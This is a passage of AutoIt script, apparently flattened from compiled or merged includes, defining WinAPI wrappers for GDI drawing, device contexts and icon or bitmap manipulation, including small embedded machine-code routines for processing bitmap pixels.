, @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETBITMAPDIMENSION ($HBITMAP ) LOCAL $TOBJ = DLLSTRUCTCREATE ($TAGBITMAP ) LOCAL $ARET = DLLCALL ("gdi32.dll" , "int" , "GetObject" , "handle" , $HBITMAP , "int" , DLLSTRUCTGETSIZE ($TOBJ ) , "struct*" , $TOBJ ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN _WINAPI_CREATESIZE (DLLSTRUCTGETDATA ($TOBJ , "bmWidth" ) , DLLSTRUCTGETDATA ($TOBJ , "bmHeight" ) ) ENDFUNC FUNC _WINAPI_GETSYSCOLORBRUSH ($IINDEX ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "handle" , "GetSysColorBrush" , "int" , $IINDEX ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETTEXTEXTENTPOINT32 ($HDC , $STEXT ) LOCAL $TSIZE = DLLSTRUCTCREATE ($TAGSIZE ) LOCAL $ISIZE = STRINGLEN ($STEXT ) LOCAL $ARET = DLLCALL ("gdi32.dll" , "bool" , "GetTextExtentPoint32W" , "handle" , $HDC , "wstr" , $STEXT , "int" , $ISIZE , "struct*" , $TSIZE ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN $TSIZE ENDFUNC FUNC _WINAPI_GETTEXTMETRICS ($HDC ) LOCAL $TTEXTMETRIC = DLLSTRUCTCREATE ($TAGTEXTMETRIC ) LOCAL $ARET = DLLCALL ("gdi32.dll" , "bool" , "GetTextMetricsW" , "handle" , $HDC , "struct*" , $TTEXTMETRIC ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN $TTEXTMETRIC ENDFUNC FUNC _WINAPI_GETWINDOWRGN ($HWND , $HRGN ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "int" , "GetWindowRgn" , "hwnd" , $HWND , "handle" , $HRGN ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_ISALPHABITMAP ($HBITMAP ) $HBITMAP = _WINAPI_COPYBITMAP ($HBITMAP ) IF NOT $HBITMAP THEN RETURN SETERROR (@ERROR + 20 , @EXTENDED , 0 ) LOCAL $ARET , $IERROR = 0 DO LOCAL $TDIB = DLLSTRUCTCREATE ($TAGDIBSECTION ) IF (NOT _WINAPI_GETOBJECT ($HBITMAP , DLLSTRUCTGETSIZE ($TDIB ) , $TDIB ) ) OR (DLLSTRUCTGETDATA ($TDIB , "bmBitsPixel" ) <> 32 ) OR (DLLSTRUCTGETDATA ($TDIB , "biCompression" ) ) THEN $IERROR = 1 EXITLOOP ENDIF $ARET = DLLCALL ("user32.dll" , "int" , "CallWindowProc" , "ptr" , __ALPHAPROC () , "ptr" , 0 , "uint" , 0 , "struct*" , $TDIB , "ptr" , 0 ) IF @ERROR OR ($ARET [0 ] = + 4294967295 ) THEN $IERROR = @ERROR + 10 EXITLOOP ENDIF UNTIL 1 _WINAPI_DELETEOBJECT ($HBITMAP ) IF $IERROR THEN RETURN SETERROR ($IERROR , 0 , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_PTINRECT (BYREF $TRECT , BYREF $TPOINT ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "PtInRect" , "struct*" , $TRECT , "struct" , $TPOINT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_REDRAWWINDOW ($HWND , $TRECT = 0 , $HREGION = 0 , $IFLAGS = 5 ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "RedrawWindow" , "hwnd" , $HWND , "struct*" , $TRECT , "handle" , $HREGION , "uint" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SETWINDOWRGN ($HWND , $HRGN , $BREDRAW = TRUE ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "int" , "SetWindowRgn" , "hwnd" , $HWND , "handle" , $HRGN , "bool" , $BREDRAW ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC #EndRegion Public Functions #Region Embedded DLL Functions FUNC __ALPHAPROC () STATIC $PPROC = 0 IF NOT $PPROC THEN IF @AUTOITX64 THEN $PPROC = __INIT (BINARY ("0x48894C240848895424104C894424184C894C24205541574831C050504883EC28" & "48837C24600074054831C0EB0748C7C0010000004821C0751F488B6C24604883" & "7D180074054831C0EB0748C7C0010000004821C07502EB0948C7C001000000EB" & "034831C04821C0740C48C7C0FFFFFFFF4863C0EB6F48C744242800000000488B" & "6C24604C637D04488B6C2460486345084C0FAFF849C1E7024983C7FC4C3B7C24" & "287C36488B6C24604C8B7D184C037C24284983C7034C897C2430488B6C243080" & "7D0000740C48C7C0010000004863C0EB1348834424280471A54831C04863C0EB" & "034831C04883C438415F5DC3" ) ) ELSE $PPROC = __INIT (BINARY ("0x555331C05050837C241C00740431C0EB05B80100000021C075198B6C241C837D" & "1400740431C0EB05B80100000021C07502EB07B801000000EB0231C021C07407" & "B8FFFFFFFFEB4FC70424000000008B6C241C8B5D048B6C241C0FAF5D08C1E302" & "83C3FC3B1C247C288B6C241C8B5D14031C2483C303895C24048B6C2404807D00" & "007407B801000000EB0C8304240471BE31C0EB0231C083C4085B5DC21000" ) ) ENDIF ENDIF RETURN $PPROC ENDFUNC FUNC __ANDPROC () STATIC $PPROC = 0 IF NOT $PPROC THEN IF @AUTOITX64 THEN $PPROC = __INIT (BINARY ("0x48894C240848895424104C894424184C894C2420554157415648C7C009000000" & "4883EC0848C704240000000048FFC875EF4883EC284883BC24A0000000007405" & "4831C0EB0748C7C0010000004821C00F85840000004883BC24A8000000007405" & "4831C0EB0748C7C0010000004821C07555488BAC24A000000048837D18007405" & "4831C0EB0748C7C0010000004821C07522488BAC24A800000048837D18007405" & "4831C0EB0748C7C0010000004821C07502EB0948C7C001000000EB034831C048" & "21C07502EB0948C7C001000000EB034831C04821C07502EB0948C7C001000000" & "EB034831C04821C0740B4831C04863C0E9D701000048C74424280000000048C7" & "44243000000000488BAC24A00000004C637D0849FFCF4C3B7C24300F8C9C0100" & "0048C74424380000000048C74424400000000048C744244800000000488BAC24" & "A00000004C637D0449FFCF4C3B7C24480F8CDB000000488BAC24A00000004C8B" & "7D184C037C24284983C7034C897C2450488B6C2450807D000074264C8B7C2440" & "4C8B74243849F7DE4983C61F4C89F148C7C00100000048D3E04909C74C897C24" & "4048FF4424384C8B7C24384983FF1F7E6F4C8B7C244049F7D74C897C244048C7" & "442458180000004831C0483B4424587F3D488BAC24A80000004C8B7D184C037C" & "24604C897C24504C8B7C2440488B4C245849D3FF4C89F850488B6C2458588845" & "0048FF4424604883442458F871B948C74424380000000048C744244000000000" & "48834424280448FF4424480F810BFFFFFF48837C24380074794C8B7C244049F7" & "D74C8B74243849F7DE4983C6204C89F148C7C0FFFFFFFF48D3E04921C74C897C" & "244048C7442458180000004831C0483B4424587F3D488BAC24A80000004C8B7D" & "184C037C24604C897C24504C8B7C2440488B4C245849D3FF4C89F850488B6C24" & "585888450048FF4424604883442458F871B948FF4424300F814AFEFFFF48C7C0" & "010000004863C0EB034831C04883C470415E415F5DC3" ) ) ELSE $PPROC = __INIT (BINARY ("0x555357BA0800000083EC04C70424000000004A75F3837C243800740431C0EB05" & "B80100000021C07562837C243C00740431C0EB05B80100000021C0753F8B6C24" & "38837D1400740431C0EB05B80100000021C075198B6C243C837D1400740431C0" & "EB05B80100000021C07502EB07B801000000EB0231C021C07502EB07B8010000" & "00EB0231C021C07502EB07B801000000EB0231C021C0740731C0E969010000C7" & "042400000000C7442404000000008B6C24388B5D084B3B5C24040F8C3F010000" & "C744240800000000C744240C00000000C7442410000000008B6C24388B5D044B" & "3B5C24100F8CA90000008B6C24388B5D14031C2483C303895C24148B6C241480" & "7D0000741C8B5C240C8B7C2408F7DF83C71F89F9B801000000D3E009C3895C24" & "0CFF4424088B5C240883FB1F7E578B5C240CF7D3895C240CC744241818000000" & "31C03B4424187F2D8B6C243C8B5D14035C241C895C24148B5C240C8B4C2418D3" & "FB538B6C241858884500FF44241C83442418F871CBC744240800000000C74424" & "0C0000000083042404FF4424100F8145FFFFFF837C240800745B8B5C240CF7D3" & "8B7C2408F7DF83C72089F9B8FFFFFFFFD3E021C3895C240CC744241818000000" & "31C03B4424187F2D8B6C243C8B5D14035C241C895C24148B5C240C8B4C2418D3" & "FB538B6C241858884500FF44241C83442418F871CBFF4424040F81AFFEFFFFB8" & "01000000EB0231C083C4205F5B5DC21000" ) ) ENDIF ENDIF RETURN $PPROC ENDFUNC FUNC __XORPROC () STATIC $PPROC = 0 IF NOT $PPROC THEN IF @AUTOITX64 THEN $PPROC = __INIT (BINARY ("0x48894C240848895424104C894424184C894C24205541574831C050504883EC28" & "48837C24600074054831C0EB0748C7C0010000004821C0751B48837C24680074" & "054831C0EB0748C7C0010000004821C07502EB0948C7C001000000EB034831C0" & "4821C074084831C04863C0EB7748C7442428000000004C637C24584983C7FC4C" & "3B7C24287C4F4C8B7C24604C037C24284C897C2430488B6C2430807D00007405" & "4831C0EB0748C7C0010000004821C0741C4C8B7C24684C037C24284983C7034C" & "897C2430488B6C2430C64500FF48834424280471A148C7C0010000004863C0EB" & "034831C04883C438415F5DC3" ) ) ELSE $PPROC = __INIT (BINARY ("0x555331C05050837C241C00740431C0EB05B80100000021C07516837C24200074" & "0431C0EB05B80100000021C07502EB07B801000000EB0231C021C0740431C0EB" & "5AC70424000000008B5C241883C3FC3B1C247C3E8B5C241C031C24895C24048B" & "6C2404807D0000740431C0EB05B80100000021C074168B5C2420031C2483C303" & "895C24048B6C2404C64500FF8304240471B6B801000000EB0231C083C4085B5D" & "C21000" ) ) ENDIF ENDIF RETURN $PPROC ENDFUNC #EndRegion Embedded DLL Functions #Region Internal Functions FUNC __INIT ($DDATA ) LOCAL $ILENGTH = BINARYLEN ($DDATA ) LOCAL $ARET = DLLCALL ("kernel32.dll" , "ptr" , "VirtualAlloc" , "ptr" , 0 , "ulong_ptr" , $ILENGTH , "dword" , 4096 , "dword" , 64 ) IF @ERROR OR NOT $ARET [0 ] THEN __FATALEXIT (1 , "Error allocating memory." ) LOCAL $TDATA = DLLSTRUCTCREATE ("byte[" & $ILENGTH & "]" , $ARET [0 ] ) DLLSTRUCTSETDATA ($TDATA , 1 , $DDATA ) RETURN $ARET [0 ] ENDFUNC #EndRegion Internal Functions #Region Global Variables and Constants GLOBAL CONST $DI_MASK = 1 GLOBAL CONST $DI_IMAGE = 2 GLOBAL CONST $DI_NORMAL = 3 GLOBAL CONST $DI_COMPAT = 4 GLOBAL CONST $DI_DEFAULTSIZE = 8 GLOBAL CONST $DI_NOMIRROR = 16 GLOBAL CONST $DISPLAY_DEVICE_ATTACHED_TO_DESKTOP = 1 GLOBAL CONST $DISPLAY_DEVICE_MULTI_DRIVER = 2 GLOBAL CONST $DISPLAY_DEVICE_PRIMARY_DEVICE = 4 GLOBAL CONST $DISPLAY_DEVICE_MIRRORING_DRIVER = 8 GLOBAL CONST $DISPLAY_DEVICE_VGA_COMPATIBLE = 16 GLOBAL CONST $DISPLAY_DEVICE_REMOVABLE = 32 GLOBAL CONST $DISPLAY_DEVICE_DISCONNECT = 33554432 GLOBAL CONST $DISPLAY_DEVICE_REMOTE = 67108864 GLOBAL CONST $DISPLAY_DEVICE_MODESPRUNED = 134217728 #EndRegion Global Variables and Constants #Region Functions list #EndRegion Functions list #Region Public Functions FUNC _WINAPI_CREATECOMPATIBLEDC ($HDC ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "handle" , "CreateCompatibleDC" , "handle" , $HDC ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_DELETEDC ($HDC ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "bool" , "DeleteDC" , "handle" , $HDC ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_DRAWEDGE ($HDC , $TRECT , $IEDGETYPE , $IFLAGS ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "DrawEdge" , "handle" , $HDC , "struct*" , $TRECT , "uint" , $IEDGETYPE , "uint" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_DRAWFRAMECONTROL ($HDC , $TRECT , $ITYPE , $ISTATE ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "DrawFrameControl" , "handle" , $HDC , "struct*" , $TRECT , "uint" , $ITYPE , "uint" , $ISTATE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_DRAWICON ($HDC , $IX , $IY , $HICON ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "DrawIcon" , "handle" , $HDC , "int" , $IX , "int" , $IY , "handle" , $HICON ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_DRAWICONEX ($HDC , $IX , $IY , $HICON , $IWIDTH = 0 , $IHEIGHT = 0 , $ISTEP = 0 , $HBRUSH = 0 , $IFLAGS = 3 ) LOCAL $IOPTIONS SWITCH $IFLAGS CASE 1 $IOPTIONS = $DI_MASK CASE 2 $IOPTIONS = $DI_IMAGE CASE 3 $IOPTIONS = $DI_NORMAL CASE 4 $IOPTIONS = $DI_COMPAT CASE 5 $IOPTIONS = $DI_DEFAULTSIZE CASE ELSE $IOPTIONS = $DI_NOMIRROR ENDSWITCH LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "DrawIconEx" , "handle" , $HDC , "int" , $IX , "int" , $IY , "handle" , $HICON , "int" , $IWIDTH , "int" , $IHEIGHT , "uint" , $ISTEP , "handle" , $HBRUSH , "uint" , $IOPTIONS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_DRAWTEXT ($HDC , $STEXT , BYREF $TRECT , $IFLAGS ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "int" , "DrawTextW" , "handle" , $HDC , "wstr" , $STEXT , "int" , + 4294967295 , "struct*" , $TRECT , "uint" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_ENUMDISPLAYDEVICES ($SDEVICE , $IDEVNUM ) LOCAL $TNAME = 0 , $IFLAGS = 0 , $ADEVICE [5 ] IF $SDEVICE <> "" THEN $TNAME = DLLSTRUCTCREATE ("wchar Text[" & STRINGLEN ($SDEVICE ) + 1 & "]" ) DLLSTRUCTSETDATA ($TNAME , "Text" , $SDEVICE ) ENDIF LOCAL CONST $TAGDISPLAY_DEVICE = "dword Size;wchar Name[32];wchar String[128];dword Flags;wchar ID[128];wchar Key[128]" LOCAL $TDEVICE = DLLSTRUCTCREATE ($TAGDISPLAY_DEVICE ) LOCAL $IDEVICE = DLLSTRUCTGETSIZE ($TDEVICE ) DLLSTRUCTSETDATA ($TDEVICE , "Size" , $IDEVICE ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "EnumDisplayDevicesW" , "struct*" , $TNAME , "dword" , $IDEVNUM , "struct*" , $TDEVICE , "dword" , 1 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $IN = DLLSTRUCTGETDATA ($TDEVICE , "Flags" ) IF BITAND ($IN , $DISPLAY_DEVICE_ATTACHED_TO_DESKTOP ) <> 0 THEN $IFLAGS = BITOR ($IFLAGS , 1 ) IF BITAND ($IN , $DISPLAY_DEVICE_PRIMARY_DEVICE ) <> 0 THEN $IFLAGS = BITOR ($IFLAGS , 2 ) IF BITAND ($IN , $DISPLAY_DEVICE_MIRRORING_DRIVER ) <> 0 THEN $IFLAGS = BITOR ($IFLAGS , 4 ) IF BITAND ($IN , $DISPLAY_DEVICE_VGA_COMPATIBLE ) <> 0 THEN $IFLAGS = BITOR ($IFLAGS , 8 ) IF BITAND ($IN , $DISPLAY_DEVICE_REMOVABLE ) <> 0 THEN $IFLAGS = BITOR ($IFLAGS , 16 ) IF BITAND ($IN , $DISPLAY_DEVICE_MODESPRUNED ) <> 0 THEN $IFLAGS = BITOR ($IFLAGS , 32 ) $ADEVICE [0 ] = TRUE $ADEVICE [1 ] = DLLSTRUCTGETDATA ($TDEVICE , "Name" ) $ADEVICE [2 ] = DLLSTRUCTGETDATA ($TDEVICE , "String" ) $ADEVICE [3 ] = $IFLAGS $ADEVICE [4 ] = DLLSTRUCTGETDATA ($TDEVICE , "ID" ) RETURN $ADEVICE ENDFUNC FUNC _WINAPI_FILLRECT ($HDC , $TRECT , $HBRUSH ) LOCAL $ARESULT IF ISPTR ($HBRUSH ) THEN $ARESULT = DLLCALL ("user32.dll" , "int" , "FillRect" , "handle" , $HDC , "struct*" , $TRECT , "handle" , $HBRUSH ) ELSE $ARESULT = DLLCALL ("user32.dll" , "int" , "FillRect" , "handle" , $HDC , "struct*" , $TRECT , "dword_ptr" , $HBRUSH ) ENDIF IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_FRAMERECT ($HDC , $TRECT , $HBRUSH ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "int" , "FrameRect" , "handle" , $HDC , "struct*" , $TRECT , "handle" , $HBRUSH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETBKMODE ($HDC ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "int" , "GetBkMode" , "handle" , $HDC ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETDC ($HWND ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "handle" , "GetDC" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETDCEX ($HWND , $HRGN , $IFLAGS ) LOCAL $ARET = DLLCALL ("user32.dll" , "handle" , "GetDCEx" , "hwnd" , $HWND , "handle" , $HRGN , "dword" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETDEVICECAPS ($HDC , $IINDEX ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "int" , "GetDeviceCaps" , "handle" , $HDC , "int" , $IINDEX ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETTEXTCOLOR ($HDC ) LOCAL $ARET = DLLCALL ("gdi32.dll" , "dword" , "GetTextColor" , "handle" , $HDC ) IF @ERROR OR ($ARET [0 ] = 0xFFFFFFFF ) THEN RETURN SETERROR (@ERROR , @EXTENDED , + 4294967295 ) RETURN __RGB ($ARET [0 ] ) ENDFUNC FUNC _WINAPI_GETWINDOWDC ($HWND ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "handle" , "GetWindowDC" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_PRINTWINDOW ($HWND , $HDC , $BCLIENT = FALSE ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "PrintWindow" , "hwnd" , $HWND , "handle" , $HDC , "uint" , $BCLIENT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_RELEASEDC ($HWND , $HDC ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "int" , "ReleaseDC" , "hwnd" , $HWND , "handle" , $HDC ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_RESTOREDC ($HDC , $IID ) LOCAL $ARET = DLLCALL ("gdi32.dll" , "bool" , "RestoreDC" , "handle" , $HDC , "int" , $IID ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SAVEDC ($HDC ) LOCAL $ARET = DLLCALL ("gdi32.dll" , "int" , "SaveDC" , "handle" , $HDC ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SETBKCOLOR ($HDC , $ICOLOR ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "INT" , "SetBkColor" , "handle" , $HDC , "INT" , $ICOLOR ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , + 4294967295 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SETBKMODE ($HDC , $IBKMODE ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "int" , "SetBkMode" , "handle" , $HDC , "int" , $IBKMODE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SETTEXTCOLOR ($HDC , $ICOLOR ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "INT" , "SetTextColor" , "handle" , $HDC , "INT" , $ICOLOR ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , + 4294967295 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_TWIPSPERPIXELX () LOCAL $HDC , $ITWIPSPERPIXELX $HDC = _WINAPI_GETDC (0 ) LOCAL CONST $__WINAPICONSTANT_LOGPIXELSX = 88 $ITWIPSPERPIXELX = 1440 / _WINAPI_GETDEVICECAPS ($HDC , $__WINAPICONSTANT_LOGPIXELSX ) _WINAPI_RELEASEDC (0 , $HDC ) RETURN $ITWIPSPERPIXELX ENDFUNC FUNC _WINAPI_TWIPSPERPIXELY () LOCAL $HDC , $ITWIPSPERPIXELY $HDC = _WINAPI_GETDC (0 ) LOCAL CONST $__WINAPICONSTANT_LOGPIXELSY = 90 $ITWIPSPERPIXELY = 1440 / _WINAPI_GETDEVICECAPS ($HDC , $__WINAPICONSTANT_LOGPIXELSY ) _WINAPI_RELEASEDC (0 , $HDC ) RETURN $ITWIPSPERPIXELY ENDFUNC #EndRegion Public Functions #Region Internal Functions #EndRegion Internal Functions #Region Global Variables and Constants #EndRegion Global Variables and Constants #Region Functions list #EndRegion Functions list #Region Public Functions GLOBAL CONST $TAGICONINFO = "bool Icon;dword XHotSpot;dword YHotSpot;handle hMask;handle hColor" FUNC _WINAPI_ADDICONTRANSPARENCY ($HICON , $IPERCENT = 50 , $BDELETE = FALSE ) LOCAL $TBITMAP , $HDIB = 0 , $HRESULT = 0 LOCAL $AHBITMAP [2 ] LOCAL $TICONINFO = DLLSTRUCTCREATE ($TAGICONINFO ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "GetIconInfo" , "handle" , $HICON , "struct*" , $TICONINFO ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) FOR $I = 0 TO 1 $AHBITMAP [$I ] = DLLSTRUCTGETDATA ($TICONINFO , $I + 4 ) NEXT LOCAL $IERROR = 0 DO $HDIB = _WINAPI_COPYBITMAP ($AHBITMAP [1 ] ) IF NOT $HDIB THEN $IERROR = 20 EXITLOOP ENDIF $TBITMAP = DLLSTRUCTCREATE ($TAGBITMAP ) IF (NOT _WINAPI_GETOBJECT ($HDIB , DLLSTRUCTGETSIZE ($TBITMAP ) , $TBITMAP ) ) OR (DLLSTRUCTGETDATA ($TBITMAP , "bmBitsPixel" ) <> 32 ) THEN $IERROR = 21 EXITLOOP ENDIF $ARET = DLLCALL ("user32.dll" , "lresult" , "CallWindowProc" , "PTR" , __TRANSPARENCYPROC () , "hwnd" , 0 , "uint" , $IPERCENT , "wparam" , DLLSTRUCTGETPTR ($TBITMAP ) , "lparam" , 0 ) IF @ERROR OR NOT $ARET [0 ] THEN $IERROR = @ERROR + 30 EXITLOOP ENDIF IF $ARET [0 ] = + 4294967295 THEN $HRESULT = _WINAPI_CREATEEMPTYICON (DLLSTRUCTGETDATA ($TBITMAP , "bmWidth" ) , DLLSTRUCTGETDATA ($TBITMAP , "bmHeight" ) ) ELSE $HRESULT = _WINAPI_CREATEICONINDIRECT ($HDIB , $AHBITMAP [0 ] ) ENDIF IF NOT $HRESULT THEN $IERROR = 22 UNTIL 1 IF $HDIB THEN _WINAPI_DELETEOBJECT ($HDIB ) ENDIF FOR $I = 0 TO 1 IF $AHBITMAP [$I ] THEN _WINAPI_DELETEOBJECT ($AHBITMAP [$I ] ) ENDIF NEXT IF $IERROR THEN RETURN SETERROR ($IERROR , 0 , 0 ) IF $BDELETE THEN _WINAPI_DESTROYICON ($HICON ) ENDIF RETURN $HRESULT ENDFUNC FUNC _WINAPI_COPYICON ($HICON ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "handle" , "CopyIcon" , "handle" , $HICON ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_CREATE32BITHICON ($HICON , $BDELETE = FALSE ) LOCAL $AHBITMAP [2 ] , $HRESULT = 0 LOCAL $ADIB [2 ] [2 ] = [[0 , 0 ] , [0 , 0 ] ] LOCAL $TICONINFO = DLLSTRUCTCREATE ($TAGICONINFO ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "GetIconInfo" , "handle" , $HICON , "struct*" , $TICONINFO ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF NOT $ARET [0 ] THEN RETURN SETERROR (10 , 0 , 0 ) FOR $I = 0 TO 1 $AHBITMAP [$I ] = DLLSTRUCTGETDATA ($TICONINFO , $I + 4 ) NEXT IF _WINAPI_ISALPHABITMAP ($AHBITMAP [1 ] ) THEN $ADIB [0 ] [0 ] = _WINAPI_CREATEANDBITMAP ($AHBITMAP [1 ] ) IF NOT @ERROR THEN $HRESULT = _WINAPI_CREATEICONINDIRECT ($AHBITMAP [1 ] , $ADIB [0 ] [0 ] ) ENDIF ELSE LOCAL $TSIZE = _WINAPI_GETBITMAPDIMENSION ($AHBITMAP [1 ] ) LOCAL $ASIZE [2 ] FOR $I = 0 TO 1 $ASIZE [$I ] = DLLSTRUCTGETDATA ($TSIZE , $I + 1 ) NEXT LOCAL $HSRCDC = _WINAPI_CREATECOMPATIBLEDC (0 ) LOCAL $HDSTDC = _WINAPI_CREATECOMPATIBLEDC (0 ) LOCAL $HSRCSV , $HDSTSV FOR $I = 0 TO 1 $ADIB [$I ] [0 ] = _WINAPI_CREATEDIB ($ASIZE [0 ] , $ASIZE [1 ] ) $ADIB [$I ] [1 ] = $__G_VEXT $HSRCSV = _WINAPI_SELECTOBJECT ($HSRCDC , $AHBITMAP [$I ] ) $HDSTSV = _WINAPI_SELECTOBJECT ($HDSTDC , $ADIB [$I ] [0 ] ) _WINAPI_BITBLT ($HDSTDC , 0 , 0 , $ASIZE [0 ] , $ASIZE [1 ] , $HSRCDC , 0 , 0 , 12583114 ) _WINAPI_SELECTOBJECT ($HSRCDC , $HSRCSV ) _WINAPI_SELECTOBJECT ($HDSTDC , $HDSTSV ) NEXT _WINAPI_DELETEDC ($HSRCDC ) _WINAPI_DELETEDC ($HDSTDC ) $ARET = DLLCALL ("user32.dll" , "lresult" , "CallWindowProc" , "ptr" , __XORPROC () , "ptr" , 0 , "uint" , $ASIZE [0 ] * $ASIZE [1 ] * 4 , "wparam" , $ADIB [0 ] [1 ] , "lparam" , $ADIB [1 ] [1 ] ) IF NOT @ERROR AND $ARET [0 ] THEN $HRESULT = _WINAPI_CREATEICONINDIRECT ($ADIB [1 ] [0 ] , $AHBITMAP [0 ] ) ENDIF ENDIF FOR $I = 0 TO 1 _WINAPI_DELETEOBJECT ($AHBITMAP [$I ] ) IF $ADIB [$I ] [0 ] THEN _WINAPI_DELETEOBJECT ($ADIB [$I ] [0 ] ) ENDIF NEXT IF NOT $HRESULT THEN RETURN SETERROR (11 , 0 , 0 ) IF $BDELETE THEN _WINAPI_DESTROYICON ($HICON ) ENDIF RETURN $HRESULT ENDFUNC FUNC _WINAPI_CREATEEMPTYICON ($IWIDTH , $IHEIGHT , $IBITSPERPEL = 32 ) LOCAL $HXOR = _WINAPI_CREATEDIB ($IWIDTH , $IHEIGHT , $IBITSPERPEL ) LOCAL $HAND = _WINAPI_CREATEDIB ($IWIDTH , $IHEIGHT , 1 ) LOCAL $HDC = _WINAPI_CREATECOMPATIBLEDC (0 ) LOCAL $HSV = _WINAPI_SELECTOBJECT ($HDC , $HAND ) LOCAL $HBRUSH = _WINAPI_CREATESOLIDBRUSH (16777215 ) LOCAL $TRECT 